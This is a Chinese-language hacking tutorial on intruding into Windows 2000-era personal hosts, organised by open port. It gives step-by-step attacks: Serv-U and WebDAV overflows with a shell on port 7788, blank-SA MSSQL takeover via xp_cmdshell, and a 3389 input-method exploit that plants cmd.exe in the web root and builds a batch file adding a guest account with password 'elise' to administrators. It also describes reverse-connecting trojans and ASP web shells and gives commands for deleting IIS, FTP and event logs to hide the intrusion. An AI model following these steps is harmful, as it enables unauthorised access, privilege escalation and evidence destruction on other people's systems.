【入侵】个人主机入侵网络攻击的步骤

　　21：Serv-u入侵（未测试使用）

　　Serv-u是常用的FTP SERVER端软件的一种，因为常用，所以被研究出的漏洞也不少，如果对 端开放了21端口，并且采用Seru-U来架站的话，可以查看一下对端的版本。对5. 004及以下 系统，可用溢出入侵。（serv5004.exe）对5.1.0.0及以下系统，有一个本地提升权限的漏 洞。（servlocal.exe）

　　Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户 的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录，就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、 本地系统上以FTP系统管理员权限来执行任意命令。

　　80：曾经的神话“WEBDAV”（使用情况，成功溢出4台主机，并登陆其中一台，其他3台的 IIS重启）

　　微软的IIS功能强大，但遗憾的是同样漏洞多多，如果IIS不打补丁到SP3的话，那么就有一 个著名的WEBDAV漏洞。

　　Webdav漏洞说明：

　　Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebDAV)”协议。RFC 2518 中定义的 WebDAV 是超文本传输协议 (HTTP) 的一组扩展，为 Internet 上计算aIIS 服务 （默认情况下在 LocalSystem 上下文中运行）的安全上下文中运行。 尽管 Microsoft 已 为此弱点提供了修补程序并建议客户立即安装该修补程序，但还是提供了其他的工具和预防 措施，客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利 用。

　　可以使用扫描器：Webdavscan（是一个专门用于检测IIS 5.0 服务器是否提供了对WebDAV的 支持的扫描器）来查找网络中存在WEBDAV漏洞的主机，并用溢出程序：wdx.exe来进行攻击 当溢出成功后，就可以使用telnet或者是nc等连接到目标主机的7788端口。

　　如：telnet 127.0.0.1 7788

　　如果正常的话，将出现以下提示：

　　Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>

　　OK！

　　如何防御：

　　1. 搜索注册表中的如下键：

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters

　　增加如下注册表键值：

　　value name: DisableWebDAV

　　Data type: DWORD

　　value data: 1

　　2. 使用MS提供的专用补丁！

　　1433：Microsoft SQL的SA空口令（扫描到4台，成功登陆其中3台）

　　微软的MSSQL7.0以下的版本在默认安装时其SA(System Administrator)口令为空，所开端口 为1433，这个漏洞很早了，但直到现在我们依然可以扫描到很多空口令的SA。更为“搞笑” 的是，微软为了能够让SQL管理员管理方便，还设计了一个xp_cmdshell来执行各种相关命令 。一个入侵者只需要使用一个MS SQL客户端与SA口令为空的服务器连接就可以获得System的 权限，并可以在目标主机上执行任意命令。

　　攻击方式，利用“流光”或其他扫描工具可以扫描、破解SA口令，破解成功后可以使用SQL 客户端（如SQLEXEC）连接，并获得系统权限。

　　解决办法：

　　更改SA管理用户口令；

　　删除XP_CMDSHELL命令。（但并不保险，因为如果拥有SA权限，还是可能恢复该命令的）

　　3389：3389输入法漏洞（不太可能存在了，但可以猜解管理员用户口令）

　　Microsoft Windows 2000 Server及以上版本在安装服务器时，其中有一项是超级终端服务 ，该服务可以使用户通过图形界面象管理本地计算机一样控制远程计算机（因此成为众多攻 击者的最爱）。该服务所开放的端口号为3389，是微软为了方便用户远程管理而设。但是中 文Windows 2000存在有输入漏洞，其漏洞就是用户在登录Windows 2000时，利用输入法的帮 助文件可以获得Administrators组权限。

　　1、用终端客户端程序进行连接；

　　2、按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰， 就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门；

　　3、在\"选项\"菜单上点右键--->跳转到URL\"，输入：c:\\winnt\\system32\\cmd.exe.（ 如果不能确定NT系统目录，则输入：c:\\ 或d:\\ ……进行查找确定）；

　　4、选择\"保存到磁盘\" 选择目录：c:\\inetpub\\s\\，因实际上是对方服务器上文件自身 的复制操作，所以这个过程很快就会完成；

　　5、打开IE，输入：http://ip/s/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？这我们就 完成了第一步；

　　6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat

　　7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat

　　8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add

　　guest>>go.bat

　　9、http://ip/s/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下：

　　net user guest /active:yes

　　net user guest elise

　　net localgroup administrators /add guest

　　10、在\"选项\"菜单上点右键--->跳转到URL\"，输入：c:\\inetpub\\s\\go.bat --->在磁 盘当前位置执行；

　　11、OK，.这样我们就激活了服务器的geust帐户，密码为：elise，超级用户！

　　注意事项：

　　当你用终端客户端程序登陆到他的服务器时，你的所有操作不会在他的机器上反应出来，但 如果他正打开了终端服务管理器，你就惨了了：（这时他能看到你所打开的进程id、程序映 象，你的ip及机器名，并能发消息给你！

　　1.在IE下，所拥有的只是iusr_machine权限，因而，你不要设想去做越权的事情，如启动 telnet、木马等；

　　2.url的跳转下，你将拥有超级用户的权限，好好利用吧 :-）

　　这个漏洞在WIN2000 SP1中已经修改，因此，实际网络中存在此漏洞的机器几乎没有，但是 ，据说紫光2.3版本、超级五笔的输入法中又发现此漏洞。

　　解决方法

　　1.打补丁；

　　2.删掉相关输入法，用标准就可以；

　　3.服务中关掉：Terminal Services，服务名称：TermService，对应程序名：system32 \\termsrv.exe；

　　如果对方已经修改了输入法漏洞，那么只能通过猜解目标管理员口令的方法来尝试远程登陆 。

　　5632/4899：PCANYWERE和RADMIN

　　这是两种远程控制软件，使用方式与远程终端访问类似，都支持图形化界面对远程计算机进 行管理，设计的初衷是为了让管理员能够更方便的管理设备，但这些软件，特别是RADMIN， 可以设置其在安装时，不出现任何提示，这种方式使RADMIN更多的被做为一种木马使用。攻 击者会注意扫描这些端口，因为一旦破解了相应口令就可以象操作本地计算机一样控制目标 。

　　23：猜解ADSL MODEM口令

　　很多时候，扫描只能得到一个23端口，不要沮丧，因为对于个人主机而言，这往往是因为目 标主机采用了一个ADSL MODEM上网。一般用户在使用ADSL MODEM时，往往未加设置，这时， 攻击者往往可以利用ADSL MODEM的默认口令，登陆ADSL，一旦登陆成功，就有可能窃取ADSL 帐户和口令，并可以查看到内网的IP地址设置，并通过配置NAT映射将内网PC的相关端口映 射到公网上，然后对其进行各种破解、攻击。

　　特洛伊木马

　　扫描端口、通过各种方法获得目标主机的用户权限之后，攻击者往往利用得到的权限上传执 行一个“木马”程序，以便能够更方便的控制目标主机。

　　特洛伊木马是一种或是直接由一个黑客，或是通过一个不令人起疑的用户秘密安装到目标系 统的程序。一旦安装成功并取得管理员权限，安装此程序的人就可以直接远程控制目标系统 。实际上，对于各种个人主机，在未开放端口和打全补丁后，最有效的攻击方式还是“木马 ”程序。攻击者往往利用捆绑方式将木马程序与一个普通的EXE文件、JPG或其他正常文件绑 定在一起，并利用“社会工程学”的方式，欺骗对方执行程序、查看图片等。在对方执行程 序、打开图片后，木马程序就悄无声息在用户的PC上执行，并将用户的一些相关信息通过 EMAIL或其他方式发送给攻击者，而攻击者则可以通过木马程序实施对用户电脑的控制，比 如控制文件、注册表、键盘记录甚至控制屏幕等。

　　在早期，木马程序程序隐藏的并不深，通过查看任务管理器就会发现系统内存在不明程序在 运行，并且木马程序还会在用户主机上监听特定端口（如冰河的7626），等待攻击者的连接 。典型的早期木马如BO、BO2000、SUBSERVEN、国产的经典木马“冰河”等……这种方式的 木马容易被发现，而且被攻击目标也必须连接在公网上，因为客户端是无法透过NAT、防火 墙连接到内网的用户的。

　　反弹端口类型木马，“广外女生”木马是国内出现最早反弹端口类型的木马，这个木马与传 统的木马不同，它在执行后会主动连接外网的攻击者的相关端口，这种方法就避免了传统木 马无法控制内部用户的弊端（因为防火墙一般不会对内部发出的数据做控制）。此外，“广 外女生”还会自动杀掉相关杀毒程序的进程。

　　传统木马在执行后会作为一个进程，用户可以通过杀掉进程的方法关闭，而现在的木马则会 将自己注册一个系统服务，在系统启动后自动运行。甚至会通过DLL注入，将自己隐藏在系 统服务身后。这样用户查看进程的时候既看不到可疑进程，也看不到特殊服务……典型代表 “灰鸽子”“武汉男生”。

　　ASP木马，典型代表“海阳顶端网木马”。随着ASP 技术的发展，网络上基于ASP技术开发的 网站越来越多，对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。但 是基于ASP技术的木马后门，也越来越多，而且功能也越来越强大。ASP程序本身是很多网站 提供一些互动和数据处理的程序，ASP木马则是利用ASP语言编制的脚本嵌入在网页上，当用 户浏览这些网页时会自动执行相关ASP脚本，被木马感染，这种方式更加简单和隐蔽，需要 注意的是，ASP木马往往是依靠IE浏览器的一些漏洞来执行的，因此给IE打补丁是防范ASP木 马的方法之一（当然并非万能，还有一些木马会利用IE的未知漏洞传播）。

　　清除日志

　　攻击者在取得用户权限后，为了避免被发现，就要考虑清除用户主机的相关日志，因为日志 系统往往会记录攻击者的相关攻击过程和信息。

　　Windows2000的日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP 日志、WWW日志等等，可能会根据服务器所开启的服务不同。

　　一般步骤如下:

　　1.清除IIS的日志。

　　可不要小看IIS的日志功能，它可以详细的记录下你的入侵全过程，如你用unicode入侵 时ie里打的命令，和对80端口扫描时留下的痕迹。

　　1. 日志的默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志 。那我们就切换到这个目录下吧，然后 del *.*。但由于w3svc服务还开着，日志依然还在 。

　　方法一: 如有3389可以登录,那就用notepad打开，按Ctrl+A 然后del吧。

　　方法二: net 命令

　　C:\>net stop w3svc

　　World Wide Web Publishing Service 服务正在停止。(可能会等很长的时间，也可能 不成功)

　　World Wide Web Publishing Service 服务已成功停止。

　　选择先让w3svc停止，再清除日志，不要忘了再重新打开w3svc服务。

　　C:\>net start w3svc

　　2. 清除ftp日志

　　FTP日志默认位置：%systemroot%\sys tem32\logfiles\msftpsvc1\，默认每天一个日 志，清除方法同上。

　　3. 清除Scheduler日志

　　Scheduler服务日志默认位置：%systemroot%\schedlgu.txt。清除方法同上。

　　4. 应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\sys tem32\config 。清除方法同上。

　　注意以上三个目录可能不在上面的位置，那是因为管理员做了修改。可以读取注册表值 得到他们的位置：

　　应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的

　　HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog

　　Schedluler服务日志在注册表中的

　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

　　5.清除安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它！

　　D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog

　　这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法，它是关键服务。如果不用 第三方工具，在命令行上根本没有删除安全日志和系统日志的可能！打开“控制面板”的“ 管理工具”中的“事件查看器”，在菜单的“操作”项有一个名为“连接到另一台计算机” 的菜单，点击它然后输入远程计算机的IP，然后选择远程计算机的安全性日志，右键选择它 的属性，点击属性里的“清除日志”按钮，同样的方法去清除系统日志！

　　6.上面大部分重要的日志你都已经清除了。然后要做的就是以防万一还有遗漏的了。

　　del以下的一些文件：

　　\winnt\*.log

　　system32下

　　\logfiles\*.*

　　\dtclog\*.*

　　\config\*.evt

　　\*.log

　　\*.txt